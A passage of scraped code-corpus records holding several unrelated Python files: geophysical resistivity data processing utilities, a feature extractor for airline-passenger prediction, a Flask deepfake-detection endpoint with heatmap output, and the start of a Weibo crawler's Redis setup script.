plt.figure()\n sensorsArray = np.vstack(sensors)\n from celluloid import Camera\n camera = Camera(plt.figure())\n for qq in np.arange(0,len(sequence_clean),int(np.round(len(sequence_clean)/72))):\n plt.scatter(sensorsArray[:,0],sensorsArray[:,1],color='b',alpha=0.2)\n plt.scatter(sensors[sequence_clean[qq,1]][0],sensors[sequence_clean[qq,1]][1],color='r',alpha=0.9)\n plt.scatter(sensors[sequence_clean[qq,2]][0],sensors[sequence_clean[qq,2]][1],color='g',alpha=0.9)\n plt.scatter(sensors[sequence_clean[qq,3]][0],sensors[sequence_clean[qq,3]][1],color='g',alpha=0.9)\n camera.snap()\n anim = camera.animate(blit=True) #interval=200,\n if PosXYZid is not None:\n AnimName='SeqMALMGifDescription_Splitted.mp4'\n else:\n AnimName='SeqMALMGifDescription.mp4'\n anim.save(AnimName)\n plt.close(fig)\n\n return(sequence_clean)\n \n\n def PrepareMALMData(DataName, Rec=False, \n MinV=1e-6, MaxRc=1e4, DevErr=5, Kfact=1e3, MinMaxAppRes=1e3, Rscheck=50,\n SwE=False, ExpRec=True, gIP=None, RmvE=None,\n valid=None,**kwargs):\n \"\"\"\n Prepare MALM data for ICSD analysis\n \n parameters:\n ===\n return:\n ===\n \"\"\"\n if type(DataName) is str:\n Obs = pb.importer.importSyscalPro(DataName) \n Obs.set('r', Obs('u')/Obs('i'))\n Obs.set('Rec',np.zeros(len(Obs('u'))))\n else: \n Obs = DataName\n DataName = 'test'\n \n print(\"Data before filtering:\", Obs)\n process_folder = os.getcwd()\n savefile=False\n for key, value in kwargs.items():\n if key == 'savefile':\n savefile = value\n if key == 'date':\n date = value\n process_folder = './processed_data/' + date +'/' \n \n if not os.path.exists(process_folder):\n os.makedirs(process_folder)\n if key == 'NameSave':\n NameSave = value\n \n \n if Rec==True:\n sC = Obs.sensorCount()\n # Build an unique Index list for one measurement direction:\n idxF = Obs('a')*sC**3 + Obs('b')*sC**2 + Obs('m')*sC**1 + Obs('n')\n # Build a second Index list for reciprocal measurement direction:\n idxR = Obs('m')*sC**3 + Obs('n')*sC**2 + Obs('a')*sC**1 + Obs('b')\n # for each measurement in idxF search the same idx in idxR which is your reciprocal\n #threshold=5\n recip_err=[]\n count=0\n idc2Skip = [] # search for duplicates reciprocals \n for i, dr in enumerate(idxF):\n if i in idc2Skip:\n recip_err.append(0)\n else:\n idc= np.where(dr==idxR)[0]\n if idc.size>0:\n count = count + 1\n R_dif = np.abs(Obs('r')[i] - Obs('r')[idc[0]])\n R_avg = (Obs('r')[i] + Obs('r')[idc[0]]) / 2\n recip_err.append(np.abs(R_dif / R_avg) * 100)\n idc2Skip.append(idc[0])\n else:\n recip_err.append(0)\n Dup_Vec_Bool= np.zeros([len(Obs('a'))])\n Dup_Vec_Bool[idc2Skip]=1\n\n\n idDouble = [] # search for doubles quadrupoles \n for i, dr in enumerate(idxF):\n idc= np.where(dr==idxF)[0]\n if idc.size>1:\n idDouble.append(1)\n else:\n idDouble.append(0)\n\n if ExpRec==True:\n print('Write reciprocal file') \n\n\n Obs.set('RecBool',Dup_Vec_Bool)\n Obs.set('Double',idDouble)\n Obs.markInvalid(Obs('Double') == 1)\n Obs.removeInvalid()\n print(\"Data after filtering double\", Obs)\n\n Obs.markInvalid(Obs('err') > DevErr)\n Obs.removeInvalid()\n print(\"Data after filtering contact resistance:\", Obs)\n\n Obs.markInvalid(Obs('Rec') > MaxRc)\n Obs.removeInvalid()\n print(\"Data after filtering rec threshold:\", Obs)\n Obs.markInvalid(Obs('RecBool') == 1)\n Obs.removeInvalid()\n print(\"Data after remove rec:\", Obs)\n \n print(\"Data after filtering:\", Obs)\n\n if RmvE is not None:\n Obs.set('RmvE_Vec_Bool',RmvE)\n Obs.markInvalid(Obs('RmvE_Vec_Bool') == 1)\n Obs.removeInvalid()\n print(\"Data after RmvE:\", Obs)\n\n \n 
if SwE==True:\n print('Switch electrode pair')\n IdColElecSwE_1=[]\n IdColElecSwE_2=[]\n for iSwE in enumerate(SwE):\n print(iSwE)\n for i, j in enumerate(\"abmn\"):\n IdLineElecSwE_1= np.where(iSwE[1][0]-1==np.array(Obs(j)))[0]\n IdLineElecSwE_2= np.where(iSwE[1][1]-1==np.array(Obs(j)))[0]\n IdColElecSwE_1.append(IdLineElecSwE_1)\n IdColElecSwE_2.append(IdLineElecSwE_2)\n for i, j in enumerate(\"abmn\"):\n Obs(j)[IdColElecSwE_1[i][:]]=[iSwE[1][1]-1]*np.ones(len(IdColElecSwE_1[i][:]))\n Obs(j)[IdColElecSwE_2[i]]=[iSwE[1][0]-1]*np.ones(len(IdColElecSwE_2[i][:]))\n Obs.set('a', Obs('a'))\n Obs.set('b', Obs('b'))\n Obs.set('m', Obs('m'))\n Obs.set('n', Obs('n'))\n \n \n if valid is not None:\n Obs.set('valid',valid)\n Obs.removeInvalid()\n print(\"Data after valid:\", Obs)\n\n \n if savefile==True: \n if gIP is not None: \n print('TDIP export')\n sep = '_'\n if NameSave is None:\n NameSave = process_folder + 'O'+ os.path.basename(DataName).split(sep, 1)[0] + 'M'+str(gIP) + '.txt'\n f = open(NameSave,'w')\n np.savetxt(f, np.array(Obs['m'+str(gIP)]), delimiter='\\t',fmt='%1.6f') # X is an array\n f.close()\n else:\n sep = '.'\n if NameSave is None:\n NameSave = process_folder + 'O'+ os.path.basename(DataName).split(sep, 1)[0] + '.txt'\n f = open(NameSave,'w')\n np.savetxt(f, np.array(Obs(\"r\")), delimiter='\\t',fmt='%1.6f') # X is an array\n f.close()\n print(NameSave)\n \n \n dataABMN = [np.array(Obs('a'))+1, np.array(Obs('b'))+1,\n np.array(Obs('m'))+1,np.array(Obs('n'))+1]\n dataABMN= np.vstack(dataABMN).T\n return [Obs, dataABMN]\n \n def VRTEpos(mesh=None,dim=3,MarkerVRTE=991):\n \"\"\"\n Find position of VRTE into the mesh\n \n parameters:\n ===\n * mesh_VRTs: the mesh with all virtuals sources included\n\n return:\n ===\n * VRTeCoord.txt : adequate file to be inverted into ICSD\n \"\"\"\n VRTE=[]\n Pos_vrtS=[]\n for node in mesh.nodes():\n if node.marker() == -MarkerVRTE:\n VRTE.append(node.pos())\n Pos_vrtS.append(np.array(node.pos()))\n print(str(len(VRTE)) + ' VRTEs found')\n Pos_vrtS= np.vstack(Pos_vrtS)\n \n # --- Writing the VRTe Coordinates into a file! 
------------------------------\n \n f = open('VRTeCoord.txt','w')\n np.savetxt(f, Pos_vrtS[:,0:2], delimiter='\\t',fmt='%1.3f') # X is an array\n f.close()\n if dim==3:\n f = open('VRTeCoord.txt','w')\n np.savetxt(f, Pos_vrtS[:,0:3], delimiter='\\t',fmt='%1.3f') # X is an array\n f.close()\n return Pos_vrtS\n \n \n def mesh_import(fname):\n \"\"\"\n Import a gmsh mesh and return mesh and sensors positions according to markers\n Returns\n -------\n None.\n \n \"\"\"\n ## --------- Import mesh --------- ##\n mesh3d=readGmsh(fname, verbose=True)\n #mesh3d.exportVTK('mesh3d_Markers')\n #MR.PyMesh3d() # plot mesh3d_Markers marker in 3d\n sensors = []\n for node in mesh3d.nodes():\n if node.marker() == -99:\n sensors.append(node.pos())\n elif node.marker() == -999:\n print('-999')\n sensors.append(node.pos())\n elif node.marker() == -1000:\n print('-1000')\n sensors.append(node.pos())\n return mesh3d, np.vstack(sensors)\n\n\n def streamlines(coordObs, Obs, model, mesh=None, **kwargs):\n \"\"\"\n Current streamlines; interpolate model from mesh_inv to new mesh to build streamlines\n takes the gradient of the potential and multiply it by the interpolated resistivity model\n -------\n - mesh: mesh to compute the quiver plot\n \n \"\"\"\n mesh_inv = [] # medium conductivity\n for key, value in kwargs.items():\n if key == 'Xaxis':\n Xaxis = value \n if key == 'mesh_inv':\n mesh_inv = value\n if key == 'date':\n date = value\n \n xn = 30\n yn = 30\n\n xx = np.linspace(min(coordObs[:,0]), max(coordObs[:,0]),xn)\n yy = np.linspace(min(coordObs[:,1]), max(coordObs[:,1]),yn)\n\n xx, yy = np.meshgrid(xx, yy)\n points = np.transpose(np.vstack((coordObs[:,0], coordObs[:,1])))\n print(len(points))\n print(len(Obs))\n\n if mesh is None:\n mesh = pg.createGrid(x=np.linspace(min(coordObs[:,0]), max(coordObs[:,0]),xn),\n y=np.linspace(min(coordObs[:,1]), max(coordObs[:,1]),yn))\n\n u_interp = interpolate.griddata(points,\n Obs,\n (xx, yy), \n method='cubic')\n uu = np.reshape(u_interp,[xn*yn])\n #uu = pg.interpolate(mesh, (xx, yy), Obs, method='spline')\n\n \n if isinstance(model, float):\n stream = -pg.solver.grad(mesh, uu)*(1/model) \n #jj = -uu*(1/model)\n else: \n res = pg.interpolate(mesh, mesh_inv, model, method='spline')\n \n # pg.show(mesh, data=res, notebook=True, savefig='model_interpolated.png')\n \n # plotter, _ = pg.show(mesh_inv, data=model,\n # alpha=0.9, hold=True, notebook=True)\n # plotter.view_xy()\n # plotter.show()\n # plotter.screenshot('model3d.png')\n \n #jj = -uu*(1/res).array()\n stream = -pg.solver.grad(mesh, uu)*(1/res).array()[:, None]\n \n\n if kwargs.get('vmin'):\n vmin = kwargs.get('vmin')\n else: \n vmin = min(Obs)\n \n if kwargs.get('vmax'):\n vmax = kwargs.get('vmax')\n else: \n vmax = max(Obs)\n\n if kwargs.get('ax'):\n ax = kwargs.get('ax')\n else:\n fig, ax = plt.subplots()\n \n sc=ax.scatter(coordObs[:,0], coordObs[:,1], c=Obs, \n cmap ='coolwarm',s=5e2, vmin=vmin, vmax=vmax) # norm=matplotlib.colors.Normalize()\n cbar = plt.colorbar(sc,ax=ax)\n cbar.set_label('V') \n ax.set_ylabel('y [m]',fontsize=15)\n ax.set_xlabel('x [m]',fontsize=15)\n \n if len(kwargs.get('sensors'))>0:\n sensors = kwargs.get('sensors')\n ax.scatter(sensors[:,0],sensors[:,1],color='k',marker='.',label='pot. elec')\n for i in range(len(sensors[:,0])):\n ax.annotate(str(i+1), (sensors[i,0],sensors[i,1])) \n if kwargs.get('A'):\n A = kwargs.get('A')\n ax.scatter(sensors[A,0],sensors[A,1],color='y',marker='^',\n label='A. 
elec', s=5e2)\n if kwargs.get('B'):\n B = kwargs.get('B')\n ax.scatter(sensors[B,0],sensors[B,1],\n color='y',marker='v',label='B. elec', s=5e2)\n if kwargs.get('Nfix'):\n Nfix = kwargs.get('Nfix')\n ax.scatter(sensors[Nfix,0],sensors[Nfix,1],color='g',marker='v',label='Nfix. elec')\n\n if kwargs.get('gridCoarse'):\n gridCoarse = pg.createGrid(x=np.linspace(min(sensors[:,0]), max(sensors[:,0]),xn/2),\n y=np.linspace(min(sensors[:,1]), max(sensors[:,1]),yn/2))\n \n\n drawStreams(ax, mesh, stream,\n color='green', quiver=True, linewidth=6.0)\n \n \n # save for TL analysis\n \n #j = -pg.solver.grad(mesh, uu) * (1/Res)\n #ax, _ = pg.show(mesh, hold=True, alpha=0.3)\n #drawStreams(ax, mesh, j)\n \n return mesh, uu, model\n\n def Ref_N_zeroP(ref_elec=71):\n \"\"\"\n The potential at the reference electrode is used as a zero potential\n and is removed to the electrical potential collected at each electrode\n Returns\n -------\n None.\n\n \"\"\"\n \n def plot_scatter_obs(x,y,V):\n \"\"\"\n Plot scattered potential\n Returns\n -------\n None.\n\n \"\"\"\n \n def load_geom(path):\n \"\"\" load the geometry of the acquisition (*geom file custum for Mise-à-la-masse data)\n \n Parameters\n ----------\n\n \"\"\"\n geom_files = [f for f in os.listdir(path) if f.endswith('.geom')]\n if len(geom_files) != 1:\n raise ValueError('should be only one geom file in the current directory')\n \n fileNameElec = geom_files[0] \n line_number = 0\n line_of_injection = []\n line_of_remotes = []\n # Open the file in read only mode\n with open(path + fileNameElec, 'r') as read_obj:\n # Read all lines in the file one by one\n for line in read_obj:\n # For each line, check if line contains the string\n # print(line)\n line_number += 1\n if ('#Remote') in line:\n # If yes, then add the line number & line as a tuple in the list\n line_of_remotes.append((line_number))\n if ('#Injection') in line:\n line_of_injection.append((line_number))\n \n # print(line_of_injection)\n # print(line_of_remotes)\n RemLineNb= int(line_of_remotes[0])-1\n Injection= int(line_of_injection[0])-1\n \n coordE = np.loadtxt(path+ fileNameElec)\n pointsE= np.vstack(coordE[:RemLineNb,1:4])\n \n return RemLineNb, Injection, coordE, pointsE\n\n def filterTDIP(dataTDIP,id2rmv):\n valid = np.ones(len(dataTDIP.data('m')))\n valid[id2rmv] = 0\n\n \n #if remove == True:\n #dataTDIP.data.set('valid',valid)\n #dataTDIP.MA = dataTDIP.MA[:, dataTDIP.data['valid'].array()==1]\n #dataTDIP.data.removeInvalid()\n\n return dataTDIP, valid\n \n#%%\n# if Nfix is not None:\n# fig, ax = plt.subplots(nrows=1, ncols=4)\n# for i, g in enumerate(range(3,20,5)):\n# ax[i].set_ylabel('y [m]',fontsize=15)\n# ax[i].set_xlabel('x [m]',fontsize=15)\n# sc=ax[i].scatter(coordE_f[:,1], coordE_f[:,2], c=Obs('M'+str(g)).array(), \n# cmap ='coolwarm',s=5e2, vmin=-100)\n# cbar = plt.colorbar(sc,ax=ax[i]) \n# ax[i].set_title('Gate t:' + str(IPcurves.t[g]) + 's')\n# for ie in range(len(sensors[:,0])):\n# ax[i].annotate(str(ie+1), (sensors[ie,0],sensors[ie,1]))\n\n\n# #%%\n\n\n# if Nfix is not None:\n# fig, ax = plt.subplots(nrows=1, ncols=2)\n# ax[0].scatter(sensors[:,0],sensors[:,1],color='k',marker='.',label='pot. elec')\n# ax[0].scatter(sensors[B,0],sensors[B,1],color='b',marker='v',label='B. elec')\n# ax[0].scatter(sensors[A,0],sensors[A,1],color='r',marker='v',label='A. elec')\n# ax[0].scatter(sensors[Nfix,0],sensors[Nfix,1],color='g',marker='v',label='Nfix. 
elec')\n# for i in range(len(sensors[:,0])):\n# ax[0].annotate(str(i+1), (sensors[i,0],sensors[i,1]))\n \n# ax[0].legend(loc=\"upper right\") \n# ax[0].set_xlabel('x (m)')\n# ax[0].set_ylabel('y (m)')\n \n# # plot secondary voltage distribuion along a given profile\n# abmn=[]\n# for nn in range(len(IPcurves_f.data['a'])):\n# abmn.append([int(IPcurves_f.data(t)[nn]+1) for t in ['a', 'b', 'm', 'n']])\n# abmn = np.vstack(abmn)\n \n# # define the profile\n# pelecs = np.array([0,1,2,3,4,5,6,7]) +32\n# pelecs = np.array([0,1,2,3,4,5,6,7]) +16\n# pelecs = np.array([0,1,2,3,4,5,6,7]) +32\n# pelecs = np.array([5,13,21,29,37,45,53,61,69])\n \n# idp = np.zeros(len(pelecs))\n# Vg = np.zeros(20)\n# Vi = np.zeros([20,len(pelecs)])\n# for i,p in enumerate(pelecs):\n# if(len(np.where(p+1==abmn)[0]))>0:\n# idp[i]= np.where(p+1==abmn)[0][0]\n# for g in range(20):\n# gatestr = 'M' + str(g+1)\n# Vg[g] = IPcurves_f.data[gatestr].array()[int(idp[i])]\n# Vi[:,i] = Vg\n \n# for g in range(3,20,5):\n# ax[1].plot(pelecs+1,Vi[g,:],'o-', alpha=0.5, \n# label='Gate t:' + str(IPcurves.t[g]) + 's')\n# plt.legend() \n# plt.xlabel('# Electrode')\n# plt.ylabel('Secondary voltage (mV)')\n# plt.xticks(pelecs+1)\n\n# if Nfix is not None:\n# fig, ax = plt.subplots(nrows=1, ncols=2)\n# sc=ax[0].scatter(coordE_f[:,1], coordE_f[:,2], c=abs(Obs('r').array()), \n# cmap ='coolwarm',s=5e2, vmin=0.1, vmax=200) # norm=matplotlib.colors.Normalize()\n# cbar = plt.colorbar(sc,ax=ax[0])\n# cbar.set_label('V') \n# ax[0].scatter(sensors[:,0],sensors[:,1],color='k',marker='.',label='pot. elec')\n# ax[0].scatter(sensors[B,0],sensors[B,1],color='b',marker='v',label='B. elec')\n# ax[0].scatter(sensors[A,0],sensors[A,1],color='r',marker='v',label='A. elec')\n# ax[0].scatter(sensors[Nfix,0],sensors[Nfix,1],color='g',marker='v',label='Nfix. 
elec')\n# for i in range(len(sensors[:,0])):\n# ax[0].annotate(str(i+1), (sensors[i,0],sensors[i,1])) \n# ax[0].set_ylabel('y [m]',fontsize=15)\n# ax[0].set_xlabel('x [m]',fontsize=15)\n# sc=ax[1].scatter(coordE_f[:,1], coordE_f[:,2], c=Obs('gm').array(), \n# cmap ='coolwarm',s=5e2, norm=matplotlib.colors.Normalize())\n# cbar = plt.colorbar(sc,ax=ax[1]) \n# ax[1].set_title('Global chargeability')\n# ","repo_name":"BenjMy/rhizotron_tdip","sub_path":"rhizo/utils_rhizo.py","file_name":"utils_rhizo.py","file_ext":"py","file_size_in_byte":28652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14939867652","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport os\n\nclass FeatureExtractor(object):\n    def __init__(self):\n        pass\n\n    def fit(self, X_df, y_array):\n        pass\n\n\n    def quarter(self, m):\n        if m <= 3:\n            return 1\n        elif m <= 6:\n            return 2\n        elif m <= 9:\n            return 3\n        return 4\n    \n    def trouver_airport(self, i):\n        airports = {'ATL':0, 'ORD':1, 'LAX':2, 'DFW':3, 'DEN':4, 'JFK':5, 'SFO':6, 'CLT':7, 'LAS':8, 'PHX':9, 'IAH':10, 'MIA':11, 'MCO':12, 'EWR':13, 'SEA':14, 'MSP':15, 'DTW':16, 'PHL':17, 'BOS':18, 'LGA':19}\n        for airport in airports:\n            if airports[airport] == i:\n                return airport\n        pass\n\n\n    def somme(self, tab):\n        n,m = tab.shape\n        t = 0\n        for i in range(n):\n            for j in range(m):\n                t += tab[i][j]\n        return t\n    \n    def completer_trous(self, Xs):\n        airports = {'ATL':0, 'ORD':1, 'LAX':2, 'DFW':3, 'DEN':4, 'JFK':5, 'SFO':6, 'CLT':7, 'LAS':8, 'PHX':9, 'IAH':10, 'MIA':11, 'MCO':12, 'EWR':13, 'SEA':14, 'MSP':15, 'DTW':16, 'PHL':17, 'BOS':18, 'LGA':19}\n        nb = len(airports)\n        nb_quarters = 4\n        nb_years = 3\n        nb_features = 8\n        \n        Ys = np.zeros(nb*nb*nb_quarters*nb_years*nb_features, dtype = int)\n        Ys = Ys.reshape((nb* nb* nb_quarters* nb_years, nb_features))\n        ll = nb* nb* nb_quarters* nb_years\n        l = len(Xs)\n        \n        tab = np.zeros(nb*nb*nb_quarters*nb_years)\n        tab = tab.reshape((nb, nb, nb_quarters, nb_years))\n        total_fares = np.zeros(nb*nb)\n        total_fares = total_fares.reshape((nb, nb))\n        total_pax = np.zeros(nb*nb*nb_quarters*nb_years)\n        total_pax = total_pax.reshape((nb, nb, nb_quarters, nb_years))\n        average_fares = np.zeros(nb*nb*nb_quarters*nb_years)\n        average_fares = average_fares.reshape((nb, nb, nb_quarters, nb_years))\n        \n        #Build the table of all routes and fill it in\n        x = 0\n        for i in range(l):\n            ligne = Xs[i]\n            orig = airports[ligne[1]]\n            dest = airports[ligne[2]]\n            fares = ligne[5]\n            av_fares = ligne[6]\n            pax = ligne[4]\n            quart = ligne[3]\n            year = ligne[7]\n            tab[orig][dest][quart-1][year-2011] += 1\n            total_fares[orig][dest] += fares\n            average_fares[orig][dest][quart-1][year-2011] = av_fares\n            total_pax[orig][dest][quart-1][year-2011] = pax\n            x += 1\n        \n\n        # Fill in the gaps\n        x = 0\n        for i in range(nb):\n            for j in range(nb):\n                for y in range(nb_years):\n                    for q in range(nb_quarters):\n                        Ys[x][0] = int(x) + 1\n                        Ys[x][1] = i\n                        Ys[x][2] = j\n                        Ys[x][7] = int(y) + 2011\n                        Ys[x][3] = int(q) + 1\n                        if (tab[i][j][q][y] > 0):\n                            # use the values stored for this route/quarter/year, not leftovers from the reading loop\n                            Ys[x][4] = int(total_pax[i][j][q][y])\n                            Ys[x][5] = int(total_pax[i][j][q][y] * average_fares[i][j][q][y])\n                            Ys[x][6] = average_fares[i][j][q][y]\n                        else:\n                            Ys[x][5] = total_fares[i][j] / 7\n                            Ys[x][4] = self.somme(total_pax[i][j][:][:]) / 7\n                            Ys[x][6] = Ys[x][5] / Ys[x][4]\n                        x += 1\n        return Ys\n    \n    def transform(self, X_df):\n        X_encoded = X_df\n        path = os.path.dirname(__file__)\n        \n        airports = {'ATL':0, 'ORD':1, 'LAX':2, 'DFW':3, 'DEN':4, 'JFK':5, 'SFO':6, 'CLT':7, 'LAS':8, 'PHX':9, 'IAH':10, 'MIA':11, 'MCO':12, 'EWR':13, 'SEA':14, 'MSP':15, 'DTW':16, 
'PHL':17, 'BOS':18, 'LGA':19}\n        \n        #uncomment the line below in the submission\n        #path = os.path.dirname(__file__)\n        #data_weather = pd.read_csv(os.path.join(path, \"data_weather.csv\"))\n        #data_weather = pd.read_csv(\"data_weather.csv\")\n        \n        air_fares = pd.read_csv(os.path.join(path, \"AirFares2012Q1to2013Q2.csv\"), sep = ';')\n        tab = air_fares.values\n        # Fill the quarters that do not exist for a route with the average air fares over that route\n        data_air_fares = self.completer_trous(tab)\n        n = len(data_air_fares)\n        m = len(data_air_fares[0])\n\n        data_air_fares = np.c_[data_air_fares, np.ones(n, dtype = str)]\n\n        # define a key for the join: ORIGIN DEST Quarter Year\n        for i in range(n):\n            data_air_fares[i][m] = str((data_air_fares[i][1])) + ' ' + str(data_air_fares[i][2]) + ' ' + str(data_air_fares[i][3]) + ' ' + str(data_air_fares[i][7])\n        data_air_fares = np.delete(data_air_fares, (0), axis=1)\n        \n        X_air_fares = pd.DataFrame(data_air_fares[:], columns=['ORIGIN', 'DEST', 'Quarter', 'TotalPax', 'TotalFare', 'AverageFare', 'Year', 'Ref'])\n        X_air_fares = X_air_fares.drop('ORIGIN', axis=1)\n        X_air_fares = X_air_fares.drop('DEST', axis=1)\n        X_air_fares = X_air_fares.drop('Quarter', axis=1)\n        X_air_fares = X_air_fares.drop('TotalPax', axis=1)\n        X_air_fares = X_air_fares.drop('TotalFare', axis=1)\n        X_air_fares = X_air_fares.drop('Year', axis=1)\n        \n        X_air_fares.to_csv(path_or_buf='Result.csv', sep=';')\n\n        \n        X_encoded['DateOfDeparture'] = pd.to_datetime(X_encoded['DateOfDeparture'])\n        X_encoded['year'] = X_encoded['DateOfDeparture'].dt.year\n        X_encoded['month'] = X_encoded['DateOfDeparture'].dt.month\n        #X_encoded['day'] = X_encoded['DateOfDeparture'].dt.day\n        X_encoded['weekday'] = X_encoded['DateOfDeparture'].dt.weekday\n        X_encoded['week'] = X_encoded['DateOfDeparture'].dt.week\n        X_encoded['n_days'] = X_encoded['DateOfDeparture'].apply(lambda date: (date - pd.to_datetime(\"2011-09-01\")).days)\n\n        X_encoded = X_encoded.join(pd.get_dummies(X_encoded['year'], prefix='y'))\n        X_encoded = X_encoded.join(pd.get_dummies(X_encoded['month'], prefix='m'))\n        #X_encoded = X_encoded.join(pd.get_dummies(X_encoded['day'], prefix='d'))\n        X_encoded = X_encoded.join(pd.get_dummies(X_encoded['weekday'], prefix='wd'))\n        X_encoded = X_encoded.join(pd.get_dummies(X_encoded['week'], prefix='w'))\n\n        \n        #X_weather = data_weather[['Date', 'AirPort', 'Max TemperatureC']]\n        #X_weather = X_weather.rename(columns={'Date': 'DateOfDeparture', 'AirPort': 'Arrival'})\n        #X_encoded = X_encoded.set_index(['DateOfDeparture', 'Arrival'])\n        #X_weather = X_weather.set_index(['DateOfDeparture', 'Arrival'])\n        #X_encoded = X_encoded.join(X_weather).reset_index()\n        \n        X_encoded = X_encoded.join(pd.get_dummies(X_encoded['Departure'], prefix='d'))\n        X_encoded = X_encoded.join(pd.get_dummies(X_encoded['Arrival'], prefix='a'))\n        \n        X_encoded['quarter'] = X_encoded['month'].apply(lambda m: self.quarter(m))\n        X_encoded['ori'] = X_encoded['Departure'].apply(lambda a: airports[a])\n        X_encoded['dest'] = X_encoded['Arrival'].apply(lambda a: airports[a])\n\n        X_encoded['Ref'] = X_encoded['ori'].apply(lambda a: str(a)) + ' ' + X_encoded['dest'].apply(lambda b: str(b)) + ' ' + X_encoded['quarter'].apply(lambda b: str(b)) + ' ' + X_encoded['year'].apply(lambda b: str(b))\n        \n        X_encoded = X_encoded.merge(X_air_fares, how='left',\n                                    left_on=['Ref'], \n                                    right_on=['Ref'], sort=False)\n        \n        X_encoded = X_encoded.drop('Ref', axis=1)\n        #X_encoded = X_encoded.drop('quarter', axis=1)\n        #X_encoded = X_encoded.drop('ori', axis=1)\n        #X_encoded = 
X_encoded.drop('dest', axis=1)\n \n X_encoded['AverageFare'] = X_encoded['AverageFare'].astype(float)\n \n #X_encoded = X_encoded.drop('AverageFare', axis=1)\n \n X_encoded = X_encoded.drop('Departure', axis=1)\n X_encoded = X_encoded.drop('Arrival', axis=1)\n X_encoded = X_encoded.drop('month', axis=1)\n X_encoded = X_encoded.drop('DateOfDeparture', axis=1)\n X_encoded = X_encoded.drop('year', axis=1)\n #X_encoded = X_encoded.drop('weekday', axis=1)\n #X_encoded = X_encoded.drop('week', axis=1)\n X_encoded = X_encoded.drop('std_wtd', axis=1)\n X_encoded = X_encoded.drop('WeeksToDeparture', axis=1) \n \n #X_encoded.fillna(0)\n #print X_encoded.head()\n \n X_array = X_encoded.values\n return X_array","repo_name":"AD75006/DataCampAma","sub_path":"feature_extractor.py","file_name":"feature_extractor.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32831609021","text":"from flask import Flask, render_template, jsonify\nimport tensorflow as tf\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras import preprocessing, models, backend as K\nimport numpy as np\nimport cv2\nfrom mtcnn import MTCNN\nimport base64\n\napp = Flask(__name__)\n\nmodel = load_model('deepfake-detection2.h5')\n\n@app.route('/predict')\ndef predict():\n input_shape = (160,160,3)\n mtcnn = MTCNN()\n # Load the video\n videos_path = 'test1.mp4'\n vid_name = videos_path.split('/')[-1].split('.')[0]\n # Split it into frames and save them\n cap = cv2.VideoCapture(videos_path)\n frame = 0\n detect_face_num = 0\n\n #heat_images = []\n\n\n\n def get_face_coord(img):\n # Detect the face\n face = mtcnn.detect_faces(img)\n # If there is no face, move on to the next frame\n if not face:\n return None\n # Face position\n x1,y1,w,h = face[0]['box']\n x2 = min(x1+w, img.shape[1])\n y2 = min(y1+h, img.shape[0])\n x1 = max(x1, 0)\n y1 = max(y1, 0)\n return [y1,y2,x1,x2]\n\n\n def crop_img(face_coord):\n # Crop the image\n y1,y2,x1,x2 = face_coord\n crop_img = img[y1:y2, x1:x2]\n crop_img = cv2.resize(crop_img, (input_shape[0], input_shape[1]))\n return crop_img\n\n\n @tf.function\n def predict_and_generate_heatmap(model, img_tensor):\n # Take a frame and draw the heatmap on it\n conv_layer = model.get_layer(\"conv_7b\")\n heatmap_model = models.Model([model.inputs], [conv_layer.output, model.output])\n # # Get gradient of the winner class w.r.t. the output of the (last) conv. 
layer\n with tf.GradientTape() as gtape:\n conv_output, predictions = heatmap_model(img_tensor)\n loss = predictions[:, tf.math.argmax(predictions[0])]\n grads = gtape.gradient(loss, conv_output)\n pooled_grads = K.mean(grads, axis=(0, 1, 2))\n\n heatmap = tf.reduce_mean(tf.multiply(pooled_grads, conv_output), axis=-1)\n heatmap = tf.math.maximum(heatmap, 0)\n \n max_heat = tf.math.reduce_max(heatmap)\n # if max_heat == 0:\n # max_heat = 1e-10\n heatmap /= max_heat\n return heatmap, predictions[0][1]\n\n\n\n\n pred = 0\n while(cap.isOpened()):\n if frame > 10 or detect_face_num > 5:\n break\n\n ret, img = cap.read()\n if ret == False:\n break\n \n #img = tf.convert_to_tensor(img)\n face_coord = get_face_coord(img)\n if not face_coord:\n continue\n detect_face_num+=1\n\n crop_image = crop_img(face_coord)\n\n # Preprocess the image and run the prediction\n img_tensor = (crop_image.flatten() / 255.0).reshape(-1, input_shape[0], input_shape[1], 3)\n img_tensor = tf.convert_to_tensor(img_tensor)\n\n heatmap, predict = predict_and_generate_heatmap(model, img_tensor)\n heatmap = np.array(heatmap)\n heatmap2 = cv2.resize(heatmap, (img_tensor.shape[2], img_tensor.shape[1]))\n heatmap2 = np.uint8(255 * heatmap2)\n heatmap2 = cv2.applyColorMap(heatmap2, cv2.COLORMAP_JET)\n hif = .5\n superimposed_img = heatmap2 * hif + crop_image\n \n #heat_images.append(superimposed_img.tolist())\n pred += predict\n\n output = f'output_{vid_name}_{detect_face_num}.jpeg'\n cv2.imwrite(output, superimposed_img)\n\n # Determine the accuracy (average over detected faces)\n if detect_face_num:\n acc = pred/detect_face_num\n else:\n acc = 0\n acc = acc.numpy()\n acc = float(acc)\n\n # Accuracy and image array -> json\n return jsonify(acc=acc) # ,heat_images=heat_images\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"GMIMG/Deepfake-Detection-Challenge-Chieer","sub_path":"web/flask/flask/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"214802276","text":"#!/usr/bin/env python\n# encoding: utf-8\n\"\"\"\nFile Description: \nAuthor: nghuyong\nMail: nghuyong@163.com\nCreated Time: 2020/4/15\n\"\"\"\nimport sys\n\nimport redis\n\nfrom settings import INIT_USERS\nfrom weibo.items import WeiboItem\nfrom weibo.settings import REDIS_URL\nfrom weibo.utils import redis_utils\nfrom weibo.utils.redis_utils import RedisClient\n\nredis_client = redis.Redis.from_url(REDIS_URL)\n\n\ndef redis_init(start_url, urls):\n r = RedisClient().db\n print(f'Add urls to {start_url}')\n for url in urls:\n r.sadd(start_url, url)\n\n\ndef init_m_weibo_redis_spider():\n redis_utils.bak_weibo_filter()\n urls = []\n for init_weibo in INIT_USERS:\n urls.append(WeiboItem.url.format(uid=init_weibo, page=1))\n # 